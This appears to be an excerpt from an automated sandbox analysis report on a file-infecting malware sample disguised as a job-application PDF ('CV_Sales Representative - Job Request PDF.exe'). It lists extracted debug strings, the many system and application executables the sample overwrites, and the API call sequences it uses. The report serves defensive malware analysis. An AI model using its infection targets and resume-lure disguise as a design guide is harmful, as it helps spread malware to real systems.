            Source: Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1276391483.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.1856369751.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.1776380251.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1768773199.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mfpmp.exe, 00000019.00000002.2422170365.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2458318969.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000000.1433430853.00000000030BC000.00000004.00000001.00040000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1364309774.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mfpmp.exe, 00000019.00000002.2422170365.00000000031E8000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2458318969.0000000003C7C000.00000004.10000000.00040000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000000.1433430853.00000000030BC000.00000004.00000001.00040000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.1651749297.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatExe.pdb source: Acrobat.exe.1.dr
            Source: Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1457830708.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Spectrum.pdbGCTL source: Spectrum.exe.1.dr
            Source: Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1271520679.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1265112613.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.1617904713.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1457830708.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.1831946567.0000000000660000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1822894017.0000000000940000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821670882.0000000000940000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.1537138014.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1446513434.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: jjs.exe.1.dr
            Source: Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.1872883015.0000000000980000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1869670293.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1737896390.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1251228515.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.1856369751.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 7EFPjTEjLAB4.exe, 00000017.00000000.1273207364.000000000071F000.00000002.00000001.01000000.00000007.sdmp, 7EFPjTEjLAB4.exe, 00000026.00000002.2410736360.000000000071F000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.1721195083.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.1651749297.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.1672499236.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.1762652955.0000000001CB0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1263407309.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1256719889.0000000002020000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1257623282.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: MFPMP.pdb source: svchost.exe, 00000003.00000003.1319266499.0000000003424000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318579187.000000000341B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1319168683.000000000341A000.00000004.00000020.00020000.00000000.sdmp, 7EFPjTEjLAB4.exe, 00000017.00000002.2433723996.00000000013EE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: armsvc.exe, 00000001.00000003.1755290977.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1229505191.0000000002080000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.1776380251.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1768773199.0000000000900000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1172554244.00000000041C0000.00000004.00001000.00020000.00000000.sdmp, CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1173875272.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1249385488.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1251663225.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1354602493.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1357310872.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.00000000037EE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000003.1352886352.00000000032D4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000019.00000002.2448881491.0000000003650000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 00000001.00000003.1364309774.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdb source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: TieringEngineService.pdbGCTL source: armsvc.exe, 00000001.00000003.1318713999.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\e\src\out\Release_x64\notification_helper.exe.pdbOGP source: notification_click_helper.exe.1.dr
            Source: Binary string: ALG.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: rmiregistry.exe.1.dr
            Source: Binary string: msdtcexe.pdb source: armsvc.exe, 00000001.00000003.1234642578.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1179600004.0000000004220000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: ALG.pdbGCTL source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000003.1167141010.0000000003F20000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 00000001.00000003.1192730867.00000000019E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 0000000B.00000003.2364725219.0000000000830000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: armsvc.exe, 00000001.00000003.1468065367.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: locator.pdbGCTL source: armsvc.exe, 00000001.00000003.1271520679.0000000001C80000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1265112613.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb22 source: ADNotificationManager.exe.1.dr
            Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
            Source: Binary string: ssh-agent.pdbX source: armsvc.exe, 00000001.00000003.1309434456.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdb source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: snmptrap.pdb source: armsvc.exe, 00000001.00000003.1289023903.0000000002030000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1726057074.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: armsvc.exe, 00000001.00000003.1679115248.0000000002040000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: AppVShNotify.pdbGCTL source: armsvc.exe, 00000001.00000003.1851615508.0000000000930000.00000004.00001000.00020000.00000000.sdmp

            Spreading

            barindex
            Infects executable files (exe, dll, sys, html)
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeSystem file written: C:\Windows\System32\sppsvc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC
